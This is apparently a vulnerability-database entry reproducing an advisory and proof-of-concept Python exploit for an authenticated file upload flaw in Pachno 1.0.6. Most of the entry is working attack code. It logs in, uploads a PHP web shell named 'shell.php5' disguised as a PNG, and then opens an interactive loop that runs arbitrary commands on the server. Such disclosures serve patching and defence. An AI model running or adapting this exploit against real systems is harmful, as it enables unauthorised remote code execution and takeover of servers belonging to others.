📄 Pachno 1.0.6 Shell Upload

🗓️ 13 Apr 2026 00:00:00Reported by LiquidWormType
Pachno 1.0.6 allows authenticated uploads to /public via /uploadfile, enabling remote code execution.
#!/usr/bin/env python3
    #
    #
    # Pachno 1.0.6 (uploadfile) Unrestricted File Upload Remote Code Execution
    #
    #
    # Vendor: Daniel André Eikeland
    # Product web page: https://github.com/pachno/pachno
    # Affected version: 1.0.6
    #
    # Summary: Pachno is an open-source collaboration platform (formerly known as The Bug Genie)
    # designed for team project management, issue tracking, and documentation. It offers a module-based,
    # customizable environment for software development and team workflows, distributed under the
    # Mozilla Public License.
    #
    # Desc: The multipart file parameter to the /uploadfile endpoint allows authenticated users to
    # upload files directly to the server. File upload must be enabled by an admin, who can also
    # configure the storage path, within a web-accessible /public directory. Extension filtering
    # is ineffective. Although a blacklist exists, it is never used (dead code), allowing arbitrary
    # file types such as .php5 to be uploaded. Files are stored on disk regardless of permission
    # checks. If the upload path is web-accessible, uploaded scripts can be executed, leading to
    # remote code execution.
    #
    # Tested on: GNU/Linux
    #            Apache2
    #            PHP/7.4
    #            MySQL/5.7 (MariaDB)
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #                             @zeroscience
    #
    #
    # Advisory ID: ZSL-2026-5982
    # Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5982
    #
    #
    # 06.04.2026
    #
    #
    
    import requests
    import time
    import sys
    
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <host> <username> <password>")
        print("Example: python3 poc.py http://127.0.0.1 admin admin")
        sys.exit(1)
    
    host = sys.argv[1].rstrip('/')
    user = sys.argv[2]
    passwd = sys.argv[3]
    
    s = requests.Session()
    
    print("[+] Logging in...")
    login_data = {"username": user, "password": passwd, "rememberme": "1"}
    
    r = s.post(f"{host}/login", data=login_data, timeout=10)
    
    if r.status_code != 200 or "username=" not in str(r.cookies):
        print("[-] Login failed")
        sys.exit(1)
    
    print("[+] Login successful")
    print("[+] Uploading webshell...")
    
    webshell = '''<?php if(isset($_GET['cmd'])) echo "<pre>".shell_exec($_GET['cmd'])."</pre>"; ?>'''
    
    files = {'file': ('shell.php5', webshell, 'image/png')}
    
    r = s.post(f"{host}/uploadfile", files=files, timeout=10)
    
    if r.status_code not in [200, 201, 204]:
        print(f"[-] Upload failed: {r.status_code}")
        sys.exit(1)
    
    print("[+] Webshell uploaded successfully!")
    
    user_id = 2
    timestamp = int(time.time())
    
    filename = f"{user_id}_{timestamp}_shell.php5"
    shell_url = f"{host}/public/{filename}"
    
    print(f"[+] Filename: {filename}")
    print(f"[+] Webshell URL: {shell_url}\n")
    
    while True:
        try:
            cmd = input("___ ").strip()
            if cmd.lower() in ['exit', 'quit']:
                break
            if not cmd:
                continue
    
            resp = s.get(shell_url, params={'cmd': cmd}, timeout=10)
            print(resp.text if resp.status_code == 200 else f"[-] Error: {resp.status_code}")
    
        except KeyboardInterrupt:
            break
        except Exception as j:
            print(f"[-] Error: {j}")
    
    print("\n[+] Done")
13 Apr 2026 00:00Current
6.2Medium risk
Vulners AI Score6.2